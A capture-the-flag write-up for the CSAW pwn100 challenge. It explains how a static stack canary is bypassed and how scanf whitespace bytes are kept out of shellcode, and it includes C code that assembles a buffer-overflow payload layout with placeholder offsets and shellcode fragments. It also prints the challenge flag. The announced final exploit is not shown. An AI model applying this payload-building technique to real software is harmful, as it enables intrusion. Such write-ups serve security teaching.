
CSAW pwn100 write-up

This is a quick write-up for the PWN 100 problem in CSAW.

It was an easy pwnable challenge. The binary has a homegrown stack canary: the check is done with floating-point instructions rather than the compiler's usual canary code. You do not need to care about those instructions. All you need to care about is that the canary is static: the value is a constant in .rodata, so it is the same on every run and you can read it straight out of the binary, as IDA shows:
.rodata:08048690 dbl_8048690 dq 64.33333 ; DATA XREF: main+Cr

To exploit it, overflow the buffer, overwriting the canary slot with that same 8-byte constant so the check still passes, and keep writing past it to the saved return address.

The other problem I faced was that the shellcode I was using (and every one I found online) contains the byte \x0b. scanf treats \x0b (vertical tab) as whitespace, so it stops reading there and the rest of the payload never arrives; for the %s conversion that whitespace set is \x09 through \x0d and \x20. To get around this, I used a Metasploit encoder to encode \x0b and the other whitespace bytes out of the shellcode.
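As an added example (my code, not the write-up's exploit, which the post does not reproduce), the following C program shows the two checks described above: rebuilding the static canary bytes from the .rodata double, and screening the whole scanf-delivered payload for bytes that would stop %s early. The frame offsets, the return address and the shellcode fragments are constructed placeholders, since the post gives none of them; the canary constant is the rounded value IDA displayed, so a real payload should take the raw qword from the .rodata dump instead.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constant IDA printed for dbl_8048690. IDA rounds floating-point
 * constants for display, so for a real payload copy the raw qword from
 * the .rodata dump instead of re-encoding this decimal. */
#define CANARY_DOUBLE 64.33333

/* Constructed shellcode fragments (not working shellcode, just enough to
 * show the checks). The first is the opening of the classic i386
 * execve("/bin/sh") stub: "mov al, 0x0b" loads SYS_execve (11), which is
 * exactly how \x0b ends up in most published shellcode. */
static const unsigned char kBadShellcode[]   = {0x31, 0xc0, 0x50, 0xb0, 0x0b};
/* xor eax,eax ; push eax ; push "//sh" -- contains no whitespace bytes */
static const unsigned char kCleanShellcode[] = {0x31, 0xc0, 0x50, 0x68,
                                                0x2f, 0x2f, 0x73, 0x68};

/* Copy the in-memory bytes of the canary double into out. The target is
 * 32-bit x86 (little-endian); this assumes the host is little-endian as
 * well, so memcpy reproduces the byte order stored in the binary. */
void canary_bytes(double canary, unsigned char out[8]) {
    memcpy(out, &canary, 8);
}

/* Index of the first byte that scanf's %s conversion treats as whitespace
 * (isspace in the C locale: 0x09..0x0d and 0x20), or -1 if there is none.
 * Any such byte ends the read and truncates the payload. */
int first_scanf_bad_byte(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (isspace(buf[i]))
            return (int)i;
    return -1;
}

/* Lay out shellcode | NOP pad | canary | filler | return address.
 * buf_to_canary and canary_to_ret are hypothetical: the write-up gives no
 * frame layout, so measure them in a debugger. Returns the payload length,
 * or 0 if the shellcode does not fit or any byte (shellcode, canary or
 * address included) would stop scanf. */
size_t build_payload(const unsigned char *sc, size_t sc_len,
                     const unsigned char canary[8],
                     size_t buf_to_canary, size_t canary_to_ret,
                     uint32_t ret_addr, unsigned char *out, size_t out_cap) {
    size_t total = buf_to_canary + 8 + canary_to_ret + 4;
    if (sc_len > buf_to_canary || total > out_cap)
        return 0;
    unsigned char *p = out;
    memcpy(p, sc, sc_len);                    p += sc_len;
    memset(p, 0x90, buf_to_canary - sc_len);  p += buf_to_canary - sc_len;
    memcpy(p, canary, 8);                     p += 8;
    memset(p, 'A', canary_to_ret);            p += canary_to_ret;
    memcpy(p, &ret_addr, 4);                  p += 4;  /* little-endian host */
    if (first_scanf_bad_byte(out, total) >= 0)
        return 0;
    return total;
}

/* Build a payload with hypothetical offsets (64 bytes to the canary, 8
 * from the canary to the saved return) and a placeholder return address;
 * returns the length build_payload reports (0 on a bad byte). */
size_t demo_build(const unsigned char *sc, size_t sc_len) {
    unsigned char canary[8], payload[256];
    canary_bytes(CANARY_DOUBLE, canary);
    return build_payload(sc, sc_len, canary, 64, 8, 0xdeadbeefu,
                         payload, sizeof payload);
}

int main(void) {
    int bad = first_scanf_bad_byte(kBadShellcode, sizeof kBadShellcode);
    printf("stub with mov al,0x0b: scanf stops at byte %d\n", bad);

    unsigned char canary[8], payload[256];
    canary_bytes(CANARY_DOUBLE, canary);
    size_t n = build_payload(kCleanShellcode, sizeof kCleanShellcode, canary,
                             64, 8, 0xdeadbeefu, payload, sizeof payload);
    printf("payload (%zu bytes):", n);
    for (size_t i = 0; i < n; i++)
        printf("%s%02x", i % 16 ? " " : "\n", payload[i]);
    putchar('\n');
    return n == 0;
}
```

The reason to check the assembled payload rather than only the shellcode is that the canary bytes and the return address go through the same scanf call, so they are subject to the same whitespace rule: an address containing 0x0a or 0x20 would be cut off exactly like the \x0b in the stub.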

The final exploit is below


Flag: flag{1_533_y0u_kn0w_y0ur_w4y_4r0und_4_buff3r}

Published in writeups
